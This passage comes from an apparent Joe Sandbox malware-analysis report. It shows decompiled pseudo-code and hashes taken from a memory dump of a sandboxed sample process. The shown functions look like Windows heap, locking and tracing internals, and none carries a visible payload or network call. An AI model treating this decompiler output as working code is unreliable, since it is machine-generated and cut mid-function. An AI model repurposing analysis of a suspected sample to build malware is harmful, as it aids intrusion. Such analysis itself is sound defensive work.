                    						}
                    						E0166F7C0(_t52, _v12, _t52, 0);
                    						if(_t64 != 0) {
                    							 *_t64 = _t49;
                    							 *((intOrPtr*)(_t64 + 4)) = _v20;
                    						}
                    						L12:
                    						_t31 = 1;
                    						goto L7;
                    					}
                    					if(_t61 != 0) {
                    						 *_t61 = _t51;
                    						_t61[1] = _t54;
                    					}
                    					goto L12;
                    				} else {
                    					goto L6;
                    				}
                    			}

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 97c097c871445aae32ecfcb41ee156e3a0645e9808fbb762f51d80910bfff377
                    • Instruction ID: 9e131eb6155a33e94c79ccf695df4249f165c8aea2128981d71c3dcede25cff8
                    • Opcode Fuzzy Hash: 97c097c871445aae32ecfcb41ee156e3a0645e9808fbb762f51d80910bfff377
                    • Instruction Fuzzy Hash: FB318EB1A053518FE720CF1DCC00B26BBE9FB88B04F05496DEA9597351E7B0E804CB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E0166AA16(signed short* __ecx) {
                    				signed int _v8;
                    				intOrPtr _v12;
                    				signed short _v16;
                    				intOrPtr _v20;
                    				signed short _v24;
                    				signed short _v28;
                    				void* _v32;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				intOrPtr _t25;
                    				signed short _t38;
                    				signed short* _t42;
                    				signed int _t44;
                    				signed short* _t52;
                    				signed short _t53;
                    				signed int _t54;
                    
                    				_v8 =  *0x175d360 ^ _t54;
                    				_t42 = __ecx;
                    				_t44 =  *__ecx & 0x0000ffff;
                    				_t52 =  &(__ecx[2]);
                    				_t51 = _t44 + 2;
                    				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
                    					L4:
                    					_t25 =  *0x1757b9c; // 0x0
                    					_t53 = L01684620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
                    					__eflags = _t53;
                    					if(_t53 == 0) {
                    						L3:
                    						return E016AB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
                    					} else {
                    						E016AF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
                    						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
                    						L2:
                    						_t51 = 4;
                    						if(L01676C59(_t53, _t51, _t58) != 0) {
                    							_t28 = E01695E50(0x164c338, 0, 0,  &_v32);
                    							__eflags = _t28;
                    							if(_t28 == 0) {
                    								_t38 = ( *_t42 & 0x0000ffff) + 2;
                    								__eflags = _t38;
                    								_v24 = _t53;
                    								_v16 = _t38;
                    								_v20 = 0;
                    								_v12 = 0;
                    								E0169B230(_v32, _v28, 0x164c2d8, 1,  &_v24);
                    								_t28 = E0166F7A0(_v32, _v28);
                    							}
                    							__eflags = _t53 -  *_t52;
                    							if(_t53 !=  *_t52) {
                    								_t28 = L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                    							}
                    						}
                    						goto L3;
                    					}
                    				}
                    				_t53 =  *_t52;
                    				_t44 = _t44 >> 1;
                    				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
                    				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
                    					goto L4;
                    				}
                    				goto L2;
                    			}

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ad2184a9693fd6528d484764176f5fea82dcfc378ebd4a301e4f663bd9176439
                    • Instruction ID: dedbf719cf425ef2e583e2e1745ae8c28f9cd1967970ed3655c92b5ddf86ee8b
                    • Opcode Fuzzy Hash: ad2184a9693fd6528d484764176f5fea82dcfc378ebd4a301e4f663bd9176439
                    • Instruction Fuzzy Hash: 2731E571A0021AABCF11EFA9CD51A7FB7B9EF04700B11406EF901E7240EB749D51CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 58%
                    			E016A4A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
                    				signed int _v8;
                    				signed int* _v12;
                    				char _v13;
                    				signed int _v16;
                    				char _v21;
                    				signed int* _v24;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t29;
                    				signed int* _t32;
                    				signed int* _t41;
                    				signed int _t42;
                    				void* _t43;
                    				intOrPtr* _t51;
                    				void* _t52;
                    				signed int _t53;
                    				signed int _t58;
                    				void* _t59;
                    				signed int _t60;
                    				signed int _t62;
                    
                    				_t49 = __edx;
                    				_t62 = (_t60 & 0xfffffff8) - 0xc;
                    				_t26 =  *0x175d360 ^ _t62;
                    				_v8 =  *0x175d360 ^ _t62;
                    				_t41 = __ecx;
                    				_t51 = __edx;
                    				_v12 = __ecx;
                    				if(_a4 == 0) {
                    					if(_a8 != 0) {
                    						goto L1;
                    					}
                    					_v13 = 1;
                    					E01682280(_t26, 0x1758608);
                    					_t58 =  *_t41;
                    					if(_t58 == 0) {
                    						L11:
                    						E0167FFB0(_t41, _t51, 0x1758608);
                    						L2:
                    						 *0x175b1e0(_a4, _a8);
                    						_t42 =  *_t51();
                    						if(_t42 == 0) {
                    							_t29 = 0;
                    							L5:
                    							_pop(_t52);
                    							_pop(_t59);
                    							_pop(_t43);
                    							return E016AB640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
                    						}
                    						 *((intOrPtr*)(_t42 + 0x34)) = 1;
                    						if(_v21 != 0) {
                    							_t53 = 0;
                    							E01682280(_t28, 0x1758608);
                    							_t32 = _v24;
                    							if( *_t32 == _t58) {
                    								 *_t32 = _t42;
                    								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
                    								if(_t58 != 0) {
                    									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
                    									asm("sbb edi, edi");
                    									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
                    								}
                    							}
                    							E0167FFB0(_t42, _t53, 0x1758608);
                    							if(_t53 != 0) {
                    								L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                    							}
                    						}
                    						_t29 = _t42;
                    						goto L5;
                    					}
                    					if( *((char*)(_t58 + 0x40)) != 0) {
                    						L10:
                    						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
                    						E0167FFB0(_t41, _t51, 0x1758608);
                    						_t29 = _t58;
                    						goto L5;
                    					}
                    					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                    					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                    						goto L11;
                    					}
                    					goto L10;
                    				}
                    				L1:
                    				_v13 = 0;
                    				_t58 = 0;
                    				goto L2;
                    			}

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0524c16f0b9ff3d1ce49c4d87e250c9511b77580586bdf3cad1ef204d1d1f645
                    • Instruction ID: bc4447f1bbcb13a9b810423199deeab72c69d426996f0389b8594366c01bd070
                    • Opcode Fuzzy Hash: 0524c16f0b9ff3d1ce49c4d87e250c9511b77580586bdf3cad1ef204d1d1f645
                    • Instruction Fuzzy Hash: 9231F332201351DBC761AF69CD61B2ABBA5FB80710F88455DEE6607245CBF0DC01CF9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E016A8EC7(void* __ecx, void* __edx) {
                    				signed int _v8;
                    				signed int* _v16;
                    				intOrPtr _v20;
                    				signed int* _v24;
                    				char* _v28;
                    				signed int* _v32;
                    				intOrPtr _v36;
                    				signed int* _v40;
                    				signed int* _v44;
                    				signed int* _v48;
                    				intOrPtr _v52;
                    				signed int* _v56;
                    				signed int* _v60;
                    				signed int* _v64;
                    				intOrPtr _v68;
                    				signed int* _v72;
                    				char* _v76;
                    				signed int* _v80;
                    				signed int _v84;
                    				signed int* _v88;
                    				intOrPtr _v92;
                    				signed int* _v96;
                    				intOrPtr _v100;
                    				signed int* _v104;
                    				signed int* _v108;
                    				char _v140;
                    				signed int _v144;
                    				signed int _v148;
                    				signed int* _v152;
                    				char _v156;
                    				signed int* _v160;
                    				char _v164;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* _t67;
                    				intOrPtr _t70;
                    				void* _t71;
                    				void* _t72;
                    				signed int _t73;
                    
                    				_t69 = __edx;
                    				_v8 =  *0x175d360 ^ _t73;
                    				_t48 =  *[fs:0x30];
                    				_t72 = __edx;
                    				_t71 = __ecx;
                    				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
                    					_t48 = E01694E70(0x17586e4, 0x16a9490, 0, 0);
                    					if( *0x17553e8 > 5 && E016A8F33(0x17553e8, 0, 0x2000) != 0) {
                    						_v156 =  *((intOrPtr*)(_t71 + 0x44));
                    						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
                    						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
                    						_v164 =  *((intOrPtr*)(_t72 + 0x58));
                    						_v108 =  &_v84;
                    						_v92 =  *((intOrPtr*)(_t71 + 0x28));
                    						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
                    						_v76 =  &_v156;
                    						_t70 = 8;
                    						_v60 =  &_v144;
                    						_t67 = 4;
                    						_v44 =  &_v148;
                    						_v152 = 0;
                    						_v160 = 0;
                    						_v104 = 0;
                    						_v100 = 2;
                    						_v96 = 0;
                    						_v88 = 0;
                    						_v80 = 0;
                    						_v72 = 0;
                    						_v68 = _t70;
                    						_v64 = 0;
                    						_v56 = 0;
                    						_v52 = 0x17553e8;
                    						_v48 = 0;
                    						_v40 = 0;
                    						_v36 = 0x17553e8;
                    						_v32 = 0;
                    						_v28 =  &_v164;
                    						_v24 = 0;
                    						_v20 = _t70;
                    						_v16 = 0;
                    						_t69 = 0x164bc46;
                    						_t48 = E016E7B9C(0x17553e8, 0x164bc46, _t67, 0x17553e8, _t70,  &_v140);
                    					}
                    				}
                    				return E016AB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
                    			}

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ae8fbaff703deef7addb6ecd6e580dc223b7e1d1be6867427d53d5fbf8c8d319
                    • Instruction ID: c59874394f1fa59167a4f0450ff70933142f3afc6005b61a6dcddc2539a66da5
                    • Opcode Fuzzy Hash: ae8fbaff703deef7addb6ecd6e580dc223b7e1d1be6867427d53d5fbf8c8d319
                    • Instruction Fuzzy Hash: 8241A2B1D003189FDB20CFAAD980AADFBF9FB48310F5041AEE509A7201E7745A84CF54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 74%
                    			E0169E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
                    				intOrPtr* _v0;
                    				signed char _v4;
                    				signed int _v8;
                    				void* __ecx;
                    				void* __ebp;
                    				void* _t37;
                    				intOrPtr _t38;
                    				signed int _t44;
                    				signed char _t52;
                    				void* _t54;
                    				intOrPtr* _t56;
                    				void* _t58;
                    				char* _t59;
                    				signed int _t62;
                    
                    				_t58 = __edx;
                    				_push(0);
                    				_push(4);
                    				_push( &_v8);
                    				_push(0x24);
                    				_push(0xffffffff);
                    				if(E016A9670() < 0) {
                    					L016BDF30(_t54, _t58, _t35);
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					_push(_t54);
                    					_t52 = _v4;
                    					if(_t52 > 8) {
                    						_t37 = 0xc0000078;
                    					} else {
                    						_t38 =  *0x1757b9c; // 0x0
                    						_t62 = _t52 & 0x000000ff;
                    						_t59 = L01684620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
                    						if(_t59 == 0) {
                    							_t37 = 0xc0000017;
                    						} else {
                    							_t56 = _v0;
                    							 *(_t59 + 1) = _t52;
                    							 *_t59 = 1;
                    							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
                    							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
                    							_t44 = _t62 - 1;
                    							if(_t44 <= 7) {
                    								switch( *((intOrPtr*)(_t44 * 4 +  &M0169E810))) {
                    									case 0:
                    										L6:
                    										 *((intOrPtr*)(_t59 + 8)) = _a8;
                    										goto L7;
                    									case 1:
                    										L13:
                    										 *((intOrPtr*)(__edx + 0xc)) = _a12;
                    										goto L6;
                    									case 2:
                    										L12:
                    										 *((intOrPtr*)(__edx + 0x10)) = _a16;
                    										goto L13;
                    									case 3:
                    										L11:
                    										 *((intOrPtr*)(__edx + 0x14)) = _a20;
                    										goto L12;
                    									case 4:
                    										L10:
                    										 *((intOrPtr*)(__edx + 0x18)) = _a24;
                    										goto L11;
                    									case 5:
                    										L9:
                    										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
                    										goto L10;
                    									case 6:
                    										L17:
                    										 *((intOrPtr*)(__edx + 0x20)) = _a32;
                    										goto L9;
                    									case 7:
                    										 *((intOrPtr*)(__edx + 0x24)) = _a36;
                    										goto L17;
                    								}
                    							}
                    							L7:
                    							 *_a40 = _t59;
                    							_t37 = 0;
                    						}
                    					}
                    					return _t37;
                    				} else {
                    					_push(0x20);
                    					asm("ror eax, cl");
                    					return _a4 ^ _v8;
                    				}
                    			}

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 20dc9838b15be4f94c241f9eb00315c756f6893c6816e783225cdc8d1c51aaac
                    • Instruction ID: 1c7d19c7c4d57046860d8d0e3ebe63f1c867cedbb591993760916ee202912b82
                    • Opcode Fuzzy Hash: 20dc9838b15be4f94c241f9eb00315c756f6893c6816e783225cdc8d1c51aaac
                    • Instruction Fuzzy Hash: 57316D75A14249EFDB44CF58DC41B9ABBE8FB09314F14826AF904CB341E672ED90CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 67%
                    			E0169BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
                    				intOrPtr _v8;
                    				intOrPtr _v12;
                    				void* __ebx;
                    				void* __edi;
                    				intOrPtr _t22;
                    				intOrPtr* _t41;
                    				intOrPtr _t51;
                    
                    				_t51 =  *0x1756100; // 0x5
                    				_v12 = __edx;
                    				_v8 = __ecx;
                    				if(_t51 >= 0x800) {
                    					L12:
                    					return 0;
                    				} else {
                    					goto L1;
                    				}
                    				while(1) {
                    					L1:
                    					_t22 = _t51;
                    					asm("lock cmpxchg [ecx], edx");
                    					if(_t51 == _t22) {
                    						break;
                    					}
                    					_t51 = _t22;
                    					if(_t22 < 0x800) {
                    						continue;
                    					}
                    					goto L12;
                    				}
                    				E01682280(0xd, 0x74af1a0);
                    				_t41 =  *0x17560f8; // 0x0
                    				if(_t41 != 0) {
                    					 *0x17560f8 =  *_t41;
                    					 *0x17560fc =  *0x17560fc + 0xffff;
                    				}
                    				E0167FFB0(_t41, 0x800, 0x74af1a0);
                    				if(_t41 != 0) {
                    					L6:
                    					asm("movsd");
                    					asm("movsd");
                    					asm("movsd");
                    					asm("movsd");
                    					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
                    					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
                    					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
                    					do {
                    						asm("lock xadd [0x17560f0], ax");
                    						 *((short*)(_t41 + 0x34)) = 1;
                    					} while (1 == 0);
                    					goto L8;
                    				} else {
                    					_t41 = L01684620(0x1756100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
                    					if(_t41 == 0) {
                    						L11:
                    						asm("lock dec dword [0x1756100]");
                    						L8:
                    						return _t41;
                    					}
                    					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
                    					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
                    					if(_t41 == 0) {
                    						goto L11;
                    					}
                    					goto L6;
                    				}
                    			}











                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 10a09609578943c119dca5711ac51fea54c664ea5f24db19f5220ca75df6e673
                    • Instruction ID: c4dae598c22fb8b397e42a5217c87525516bcb677a3107605b2299f2f2413a83
                    • Opcode Fuzzy Hash: 10a09609578943c119dca5711ac51fea54c664ea5f24db19f5220ca75df6e673
                    • Instruction Fuzzy Hash: 9131D132600656DBDF51EF58E8C0BA677B8FB18321F544079ED48DB205EBB4D94A8B80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 76%
                    			E01669100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
                    				signed int _t53;
                    				signed int _t56;
                    				signed int* _t60;
                    				signed int _t63;
                    				signed int _t66;
                    				signed int _t69;
                    				void* _t70;
                    				intOrPtr* _t72;
                    				void* _t78;
                    				void* _t79;
                    				signed int _t80;
                    				intOrPtr _t82;
                    				void* _t85;
                    				void* _t88;
                    				void* _t89;
                    
                    				_t84 = __esi;
                    				_t70 = __ecx;
                    				_t68 = __ebx;
                    				_push(0x2c);
                    				_push(0x173f6e8);
                    				E016BD0E8(__ebx, __edi, __esi);
                    				 *((char*)(_t85 - 0x1d)) = 0;
                    				_t82 =  *((intOrPtr*)(_t85 + 8));
                    				if(_t82 == 0) {
                    					L4:
                    					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
                    						E017388F5(_t68, _t70, _t78, _t82, _t84, __eflags);
                    					}
                    					L5:
                    					return E016BD130(_t68, _t82, _t84);
                    				}
                    				_t88 = _t82 -  *0x17586c0; // 0x12007b0
                    				if(_t88 == 0) {
                    					goto L4;
                    				}
                    				_t89 = _t82 -  *0x17586b8; // 0x0
                    				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                    					goto L4;
                    				} else {
                    					E01682280(_t82 + 0xe0, _t82 + 0xe0);
                    					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                    					__eflags =  *((char*)(_t82 + 0xe5));
                    					if(__eflags != 0) {
                    						E017388F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
                    						goto L12;
                    					} else {
                    						__eflags =  *((char*)(_t82 + 0xe4));
                    						if( *((char*)(_t82 + 0xe4)) == 0) {
                    							 *((char*)(_t82 + 0xe4)) = 1;
                    							_push(_t82);
                    							_push( *((intOrPtr*)(_t82 + 0x24)));
                    							E016AAFD0();
                    						}
                    						while(1) {
                    							_t60 = _t82 + 8;
                    							 *(_t85 - 0x2c) = _t60;
                    							_t68 =  *_t60;
                    							_t80 = _t60[1];
                    							 *(_t85 - 0x28) = _t68;
                    							 *(_t85 - 0x24) = _t80;
                    							while(1) {
                    								L10:
                    								__eflags = _t80;
                    								if(_t80 == 0) {
                    									break;
                    								}
                    								_t84 = _t68;
                    								 *(_t85 - 0x30) = _t80;
                    								 *(_t85 - 0x24) = _t80 - 1;
                    								asm("lock cmpxchg8b [edi]");
                    								_t68 = _t84;
                    								 *(_t85 - 0x28) = _t68;
                    								 *(_t85 - 0x24) = _t80;
                    								__eflags = _t68 - _t84;
                    								_t82 =  *((intOrPtr*)(_t85 + 8));
                    								if(_t68 != _t84) {
                    									continue;
                    								}
                    								__eflags = _t80 -  *(_t85 - 0x30);
                    								if(_t80 !=  *(_t85 - 0x30)) {
                    									continue;
                    								}
                    								__eflags = _t80;
                    								if(_t80 == 0) {
                    									break;
                    								}
                    								_t63 = 0;
                    								 *(_t85 - 0x34) = 0;
                    								_t84 = 0;
                    								__eflags = 0;
                    								while(1) {
                    									 *(_t85 - 0x3c) = _t84;
                    									__eflags = _t84 - 3;
                    									if(_t84 >= 3) {
                    										break;
                    									}
                    									__eflags = _t63;
                    									if(_t63 != 0) {
                    										L40:
                    										_t84 =  *_t63;
                    										__eflags = _t84;
                    										if(_t84 != 0) {
                    											_t84 =  *(_t84 + 4);
                    											__eflags = _t84;
                    											if(_t84 != 0) {
                    												 *0x175b1e0(_t63, _t82);
                    												 *_t84();
                    											}
                    										}
                    										do {
                    											_t60 = _t82 + 8;
                    											 *(_t85 - 0x2c) = _t60;
                    											_t68 =  *_t60;
                    											_t80 = _t60[1];
                    											 *(_t85 - 0x28) = _t68;
                    											 *(_t85 - 0x24) = _t80;
                    											goto L10;
                    										} while (_t63 == 0);
                    										goto L40;
                    									}
                    									_t69 = 0;
                    									__eflags = 0;
                    									while(1) {
                    										 *(_t85 - 0x38) = _t69;
                    										__eflags = _t69 -  *0x17584c0;
                    										if(_t69 >=  *0x17584c0) {
                    											break;
                    										}
                    										__eflags = _t63;
                    										if(_t63 != 0) {
                    											break;
                    										}
                    										_t66 = E01739063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
                    										__eflags = _t66;
                    										if(_t66 == 0) {
                    											_t63 = 0;
                    											__eflags = 0;
                    										} else {
                    											_t63 = _t66 + 0xfffffff4;
                    										}
                    										 *(_t85 - 0x34) = _t63;
                    										_t69 = _t69 + 1;
                    									}
                    									_t84 = _t84 + 1;
                    								}
                    								__eflags = _t63;
                    							}
                    							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
                    							 *((char*)(_t82 + 0xe5)) = 1;
                    							 *((char*)(_t85 - 0x1d)) = 1;
                    							L12:
                    							 *(_t85 - 4) = 0xfffffffe;
                    							E0166922A(_t82);
                    							_t53 = E01687D50();
                    							__eflags = _t53;
                    							if(_t53 != 0) {
                    								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                    							} else {
                    								_t56 = 0x7ffe0386;
                    							}
                    							__eflags =  *_t56;
                    							if( *_t56 != 0) {
                    								_t56 = E01738B58(_t82);
                    							}
                    							__eflags =  *((char*)(_t85 - 0x1d));
                    							if( *((char*)(_t85 - 0x1d)) != 0) {
                    								__eflags = _t82 -  *0x17586c0; // 0x12007b0
                    								if(__eflags != 0) {
                    									__eflags = _t82 -  *0x17586b8; // 0x0
                    									if(__eflags == 0) {
                    										_t79 = 0x17586bc;
                    										_t72 = 0x17586b8;
                    										goto L18;
                    									}
                    									__eflags = _t56 | 0xffffffff;
                    									asm("lock xadd [edi], eax");
                    									if(__eflags == 0) {
                    										E01669240(_t68, _t82, _t82, _t84, __eflags);
                    									}
                    								} else {
                    									_t79 = 0x17586c4;
                    									_t72 = 0x17586c0;
                    									L18:
                    									E01699B82(_t68, _t72, _t79, _t82, _t84, __eflags);
                    								}
                    							}
                    							goto L5;
                    						}
                    					}
                    				}
                    			}



















                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9ba97aebe938f9a8f40d6b795c7bcaecbae6579c9ee775f47ebe15c2903d37e0
                    • Instruction ID: dd67854ca5652899141bbc394a70447cd5c93b04a405bb9907c1e38e74082192
                    • Opcode Fuzzy Hash: 9ba97aebe938f9a8f40d6b795c7bcaecbae6579c9ee775f47ebe15c2903d37e0
                    • Instruction Fuzzy Hash: 8731A375A01245DFDB25DF6CC9887ACFBF9BB98329F24815DC90467342C374A980CB66
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 60%
                    			E01691DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                    				char _v8;
                    				intOrPtr _v12;
                    				intOrPtr _v16;
                    				intOrPtr* _v20;
                    				void* _t22;
                    				char _t23;
                    				void* _t36;
                    				intOrPtr _t42;
                    				intOrPtr _t43;
                    
                    				_v12 = __ecx;
                    				_t43 = 0;
                    				_v20 = __edx;
                    				_t42 =  *__edx;
                    				 *__edx = 0;
                    				_v16 = _t42;
                    				_push( &_v8);
                    				_push(0);
                    				_push(0);
                    				_push(6);
                    				_push(0);
                    				_push(__ecx);
                    				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
                    				_push(_t36);
                    				_t22 = E0168F460();
                    				if(_t22 < 0) {
                    					if(_t22 == 0xc0000023) {
                    						goto L1;
                    					}
                    					L3:
                    					return _t43;
                    				}
                    				L1:
                    				_t23 = _v8;
                    				if(_t23 != 0) {
                    					_t38 = _a4;
                    					if(_t23 >  *_a4) {
                    						_t42 = L01684620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
                    						if(_t42 == 0) {
                    							goto L3;
                    						}
                    						_t23 = _v8;
                    					}
                    					_push( &_v8);
                    					_push(_t23);
                    					_push(_t42);
                    					_push(6);
                    					_push(_t43);
                    					_push(_v12);
                    					_push(_t36);
                    					if(E0168F460() < 0) {
                    						if(_t42 != 0 && _t42 != _v16) {
                    							L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
                    						}
                    						goto L3;
                    					}
                    					 *_v20 = _t42;
                    					 *_a4 = _v8;
                    				}
                    				_t43 = 1;
                    				goto L3;
                    			}













                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                    • Instruction ID: 4843ca81c11abe6fc00a30740ca25655d8a9a71a94a6f0c293f76b5c77de4c20
                    • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                    • Instruction Fuzzy Hash: 19216272A0011AFFDB21DF59CD80EABBBBDEF86654F254155FA0597210DB34AE01C7A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 53%
                    			E01680050(void* __ecx) {
                    				signed int _v8;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				intOrPtr* _t30;
                    				intOrPtr* _t31;
                    				signed int _t34;
                    				void* _t40;
                    				void* _t41;
                    				signed int _t44;
                    				intOrPtr _t47;
                    				signed int _t58;
                    				void* _t59;
                    				void* _t61;
                    				void* _t62;
                    				signed int _t64;
                    
                    				_push(__ecx);
                    				_v8 =  *0x175d360 ^ _t64;
                    				_t61 = __ecx;
                    				_t2 = _t61 + 0x20; // 0x20
                    				E01699ED0(_t2, 1, 0);
                    				_t52 =  *(_t61 + 0x8c);
                    				_t4 = _t61 + 0x8c; // 0x8c
                    				_t40 = _t4;
                    				do {
                    					_t44 = _t52;
                    					_t58 = _t52 & 0x00000001;
                    					_t24 = _t44;
                    					asm("lock cmpxchg [ebx], edx");
                    					_t52 = _t44;
                    				} while (_t52 != _t44);
                    				if(_t58 == 0) {
                    					L7:
                    					_pop(_t59);
                    					_pop(_t62);
                    					_pop(_t41);
                    					return E016AB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
                    				}
                    				asm("lock xadd [esi], eax");
                    				_t47 =  *[fs:0x18];
                    				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
                    				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
                    				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                    				if(_t30 != 0) {
                    					if( *_t30 == 0) {
                    						goto L4;
                    					}
                    					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                    					L5:
                    					if( *_t31 != 0) {
                    						_t18 = _t61 + 0x78; // 0x78
                    						E01738A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
                    					}
